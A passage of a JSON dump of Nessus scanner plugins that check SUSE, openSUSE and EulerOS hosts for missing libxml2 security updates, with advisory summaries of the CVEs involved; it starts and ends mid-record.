preg(pattern:\"^(SLED12|SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLED12 / SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! preg(pattern:\"^(2|3)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP2/3\", os_ver + \" SP\" + sp);\nif (os_ver == \"SLED12\" && (! preg(pattern:\"^(2|3)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLED12 SP2/3\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libxml2-2-2.9.4-46.12.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libxml2-2-32bit-2.9.4-46.12.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libxml2-2-debuginfo-2.9.4-46.12.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libxml2-2-debuginfo-32bit-2.9.4-46.12.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libxml2-debugsource-2.9.4-46.12.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libxml2-tools-2.9.4-46.12.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libxml2-tools-debuginfo-2.9.4-46.12.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"python-libxml2-2.9.4-46.12.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"python-libxml2-debuginfo-2.9.4-46.12.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"python-libxml2-debugsource-2.9.4-46.12.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libxml2-2-2.9.4-46.12.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libxml2-2-32bit-2.9.4-46.12.1\")) flag++;\nif 
(rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libxml2-2-debuginfo-2.9.4-46.12.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libxml2-2-debuginfo-32bit-2.9.4-46.12.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libxml2-debugsource-2.9.4-46.12.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libxml2-tools-2.9.4-46.12.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libxml2-tools-debuginfo-2.9.4-46.12.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"python-libxml2-2.9.4-46.12.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"python-libxml2-debuginfo-2.9.4-46.12.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"python-libxml2-debugsource-2.9.4-46.12.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"libxml2-2-2.9.4-46.12.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"libxml2-2-32bit-2.9.4-46.12.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"libxml2-2-debuginfo-2.9.4-46.12.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"libxml2-2-debuginfo-32bit-2.9.4-46.12.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"libxml2-debugsource-2.9.4-46.12.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"libxml2-tools-2.9.4-46.12.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"libxml2-tools-debuginfo-2.9.4-46.12.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"python-libxml2-2.9.4-46.12.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"python-libxml2-debuginfo-2.9.4-46.12.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", 
reference:\"python-libxml2-debugsource-2.9.4-46.12.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"2\", cpu:\"x86_64\", reference:\"libxml2-2-2.9.4-46.12.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"2\", cpu:\"x86_64\", reference:\"libxml2-2-32bit-2.9.4-46.12.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"2\", cpu:\"x86_64\", reference:\"libxml2-2-debuginfo-2.9.4-46.12.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"2\", cpu:\"x86_64\", reference:\"libxml2-2-debuginfo-32bit-2.9.4-46.12.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"2\", cpu:\"x86_64\", reference:\"libxml2-debugsource-2.9.4-46.12.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"2\", cpu:\"x86_64\", reference:\"libxml2-tools-2.9.4-46.12.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"2\", cpu:\"x86_64\", reference:\"libxml2-tools-debuginfo-2.9.4-46.12.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"2\", cpu:\"x86_64\", reference:\"python-libxml2-2.9.4-46.12.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"2\", cpu:\"x86_64\", reference:\"python-libxml2-debuginfo-2.9.4-46.12.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"2\", cpu:\"x86_64\", reference:\"python-libxml2-debugsource-2.9.4-46.12.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libxml2\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:24:49", "description": "This update for libxml2 fixes three security issues :\n\n - CVE-2017-15412: Prevent use after free when calling XPath extension functions that allowed remote attackers to cause DoS or potentially RCE (bsc#1077993)\n\n - CVE-2016-5131: Use-after-free vulnerability in libxml2 allowed remote attackers to cause a denial of service or possibly have unspecified 
other impact via vectors related to the XPointer range-to function. (bsc#1078813)\n\n - CVE-2017-5130: Fixed a potential remote buffer overflow in function xmlMemoryStrdup() (bsc#1078806)\n\nThis update was imported from the SUSE:SLE-12-SP2:Update update project.", "cvss3": {}, "published": "2018-02-12T00:00:00", "type": "nessus", "title": "openSUSE Security Update : libxml2 (openSUSE-2018-154)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-5131", "CVE-2017-15412", "CVE-2017-5130"], "modified": "2021-01-19T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:libxml2-2", "p-cpe:/a:novell:opensuse:libxml2-2-32bit", "p-cpe:/a:novell:opensuse:libxml2-2-debuginfo", "p-cpe:/a:novell:opensuse:libxml2-2-debuginfo-32bit", "p-cpe:/a:novell:opensuse:libxml2-debugsource", "p-cpe:/a:novell:opensuse:libxml2-devel", "p-cpe:/a:novell:opensuse:libxml2-devel-32bit", "p-cpe:/a:novell:opensuse:libxml2-tools", "p-cpe:/a:novell:opensuse:libxml2-tools-debuginfo", "p-cpe:/a:novell:opensuse:python-libxml2", "p-cpe:/a:novell:opensuse:python-libxml2-debuginfo", "p-cpe:/a:novell:opensuse:python-libxml2-debugsource", "cpe:/o:novell:opensuse:42.3"], "id": "OPENSUSE-2018-154.NASL", "href": "https://www.tenable.com/plugins/nessus/106741", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2018-154.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(106741);\n script_version(\"3.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2016-5131\", \"CVE-2017-15412\", \"CVE-2017-5130\");\n\n script_name(english:\"openSUSE Security Update : libxml2 (openSUSE-2018-154)\");\n script_summary(english:\"Check for the openSUSE-2018-154 patch\");\n\n script_set_attribute(\n 
attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for libxml2 fixes three security issues :\n\n - CVE-2017-15412: Prevent use after free when calling\n XPath extension functions that allowed remote attackers\n to cause DoS or potentially RCE (bsc#1077993)\n\n - CVE-2016-5131: Use-after-free vulnerability in libxml2\n allowed remote attackers to cause a denial of service or\n possibly have unspecified other impact via vectors\n related to the XPointer range-to function. (bsc#1078813)\n\n - CVE-2017-5130: Fixed a potential remote buffer overflow\n in function xmlMemoryStrdup() (bsc#1078806)\n\nThis update was imported from the SUSE:SLE-12-SP2:Update update\nproject.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1077993\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1078806\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1078813\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected libxml2 packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libxml2-2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libxml2-2-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libxml2-2-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libxml2-2-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libxml2-debugsource\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libxml2-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libxml2-devel-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libxml2-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libxml2-tools-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:python-libxml2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:python-libxml2-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:python-libxml2-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:42.3\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/02/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/02/12\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE42\\.3)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"42.3\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / 
x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE42.3\", reference:\"libxml2-2-2.9.4-15.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"libxml2-2-debuginfo-2.9.4-15.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"libxml2-debugsource-2.9.4-15.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"libxml2-devel-2.9.4-15.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"libxml2-tools-2.9.4-15.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"libxml2-tools-debuginfo-2.9.4-15.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"python-libxml2-2.9.4-15.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"python-libxml2-debuginfo-2.9.4-15.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"python-libxml2-debugsource-2.9.4-15.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", cpu:\"x86_64\", reference:\"libxml2-2-32bit-2.9.4-15.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", cpu:\"x86_64\", reference:\"libxml2-2-debuginfo-32bit-2.9.4-15.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", cpu:\"x86_64\", reference:\"libxml2-devel-32bit-2.9.4-15.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libxml2-2 / libxml2-2-32bit / libxml2-2-debuginfo / etc\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:29:07", "description": "According to the versions of the libxml2 packages installed, the EulerOS installation on the remote host is affected by the following vulnerabilities :\n\n - Use-after-free vulnerability in libxml2 through 2.9.4, as used in Google Chrome before 52.0.2743.82, allows remote attackers to cause a denial of service or possibly have unspecified other impact via 
vectors related to the XPointer range-to function.(CVE-2016-5131)\n\n - parser.c in libxml2 before 2.9.5 mishandles parameter-entity references because the NEXTL macro calls the xmlParserHandlePEReference function in the case of a '%' character in a DTD name.(CVE-2017-16931)\n\n - parser.c in libxml2 before 2.9.5 does not prevent infinite recursion in parameter entities.(CVE-2017-16932)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the EulerOS security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2018-06-28T00:00:00", "type": "nessus", "title": "EulerOS 2.0 SP3 : libxml2 (EulerOS-SA-2018-1156)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-5131", "CVE-2017-16931", "CVE-2017-16932"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:huawei:euleros:libxml2", "p-cpe:/a:huawei:euleros:libxml2-devel", "p-cpe:/a:huawei:euleros:libxml2-python", "cpe:/o:huawei:euleros:2.0"], "id": "EULEROS_SA-2018-1156.NASL", "href": "https://www.tenable.com/plugins/nessus/110732", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(110732);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\n \"CVE-2016-5131\",\n \"CVE-2017-16931\",\n \"CVE-2017-16932\"\n );\n\n script_name(english:\"EulerOS 2.0 SP3 : libxml2 (EulerOS-SA-2018-1156)\");\n script_summary(english:\"Checks the rpm output for the updated packages.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS host is missing multiple security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the versions of the libxml2 packages installed, the\nEulerOS installation on the remote host 
is affected by the following\nvulnerabilities :\n\n - Use-after-free vulnerability in libxml2 through 2.9.4,\n as used in Google Chrome before 52.0.2743.82, allows\n remote attackers to cause a denial of service or\n possibly have unspecified other impact via vectors\n related to the XPointer range-to\n function.(CVE-2016-5131)\n\n - parser.c in libxml2 before 2.9.5 mishandles\n parameter-entity references because the NEXTL macro\n calls the xmlParserHandlePEReference function in the\n case of a '%' character in a DTD name.(CVE-2017-16931)\n\n - parser.c in libxml2 before 2.9.5 does not prevent\n infinite recursion in parameter\n entities.)CVE-2017-16932)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2018-1156\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?b2b7c04b\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected libxml2 packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/06/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/06/28\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:libxml2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:libxml2-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:libxml2-python\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:2.0\");\n 
script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/sp\");\n script_exclude_keys(\"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nif (release !~ \"^EulerOS release 2\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"EulerOS 2.0\");\n\nsp = get_kb_item(\"Host/EulerOS/sp\");\nif (isnull(sp) || sp !~ \"^(3)$\") audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP3\");\n\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (!empty_or_null(uvp)) audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP3\", \"EulerOS UVP \" + uvp);\n\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_ARCH_NOT, \"i686 / x86_64\", cpu);\n\nflag = 0;\n\npkgs = [\"libxml2-2.9.1-6.3.h10\",\n \"libxml2-devel-2.9.1-6.3.h10\",\n \"libxml2-python-2.9.1-6.3.h10\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", sp:\"3\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = 
pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libxml2\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:28:11", "description": "According to the versions of the libxml2 packages installed, the EulerOS installation on the remote host is affected by the following vulnerabilities :\n\n - Use-after-free vulnerability in libxml2 through 2.9.4, as used in Google Chrome before 52.0.2743.82, allows remote attackers to cause a denial of service or possibly have unspecified other impact via vectors related to the XPointer range-to function.(CVE-2016-5131)\n\n - parser.c in libxml2 before 2.9.5 mishandles parameter-entity references because the NEXTL macro calls the xmlParserHandlePEReference function in the case of a '%' character in a DTD name.(CVE-2017-16931)\n\n - parser.c in libxml2 before 2.9.5 does not prevent infinite recursion in parameter entities.(CVE-2017-16932)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the EulerOS security advisory. 
Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2018-05-02T00:00:00", "type": "nessus", "title": "EulerOS 2.0 SP1 : libxml2 (EulerOS-SA-2018-1088)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-5131", "CVE-2017-16931", "CVE-2017-16932"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:huawei:euleros:libxml2", "p-cpe:/a:huawei:euleros:libxml2-devel", "p-cpe:/a:huawei:euleros:libxml2-python", "cpe:/o:huawei:euleros:2.0"], "id": "EULEROS_SA-2018-1088.NASL", "href": "https://www.tenable.com/plugins/nessus/109486", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(109486);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\n \"CVE-2016-5131\",\n \"CVE-2017-16931\",\n \"CVE-2017-16932\"\n );\n\n script_name(english:\"EulerOS 2.0 SP1 : libxml2 (EulerOS-SA-2018-1088)\");\n script_summary(english:\"Checks the rpm output for the updated packages.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS host is missing multiple security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the versions of the libxml2 packages installed, the\nEulerOS installation on the remote host is affected by the following\nvulnerabilities :\n\n - Use-after-free vulnerability in libxml2 through 2.9.4,\n as used in Google Chrome before 52.0.2743.82, allows\n remote attackers to cause a denial of service or\n possibly have unspecified other impact via vectors\n related to the XPointer range-to\n function.(CVE-2016-5131)\n\n - parser.c in libxml2 before 2.9.5 mishandles\n parameter-entity references because the NEXTL macro\n calls the xmlParserHandlePEReference function in the\n case of a '%' character in 
a DTD name.(CVE-2017-16931)\n\n - parser.c in libxml2 before 2.9.5 does not prevent\n infinite recursion in parameter\n entities.)CVE-2017-16932)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2018-1088\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?3344f26e\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected libxml2 packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/03/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/05/02\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:libxml2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:libxml2-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:libxml2-python\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:2.0\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/sp\");\n script_exclude_keys(\"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nif (release !~ \"^EulerOS release 2\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"EulerOS 2.0\");\n\nsp = get_kb_item(\"Host/EulerOS/sp\");\nif (isnull(sp) || sp !~ \"^(1)$\") audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP1\");\n\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (!empty_or_null(uvp)) audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP1\", \"EulerOS UVP \" + uvp);\n\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_ARCH_NOT, \"i686 / x86_64\", cpu);\n\nflag = 0;\n\npkgs = [\"libxml2-2.9.1-6.3.h10\",\n \"libxml2-devel-2.9.1-6.3.h10\",\n \"libxml2-python-2.9.1-6.3.h10\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", sp:\"1\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libxml2\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:10:42", "description": "It was discovered that libxml2 incorrectly handled format strings. 
If a user or automated system were tricked into opening a specially crafted document, an attacker could possibly cause libxml2 to crash, resulting in a denial of service. This issue only affected Ubuntu 12.04 LTS, Ubuntu 14.04 LTS, and Ubuntu 16.04 LTS. (CVE-2016-4448)\n\nIt was discovered that libxml2 incorrectly handled certain malformed documents. If a user or automated system were tricked into opening a specially crafted document, an attacker could cause libxml2 to crash, resulting in a denial of service, or possibly execute arbitrary code.\n(CVE-2016-4658)\n\nNick Wellnhofer discovered that libxml2 incorrectly handled certain malformed documents. If a user or automated system were tricked into opening a specially crafted document, an attacker could cause libxml2 to crash, resulting in a denial of service, or possibly execute arbitrary code. (CVE-2016-5131).\n\nNote that Tenable Network 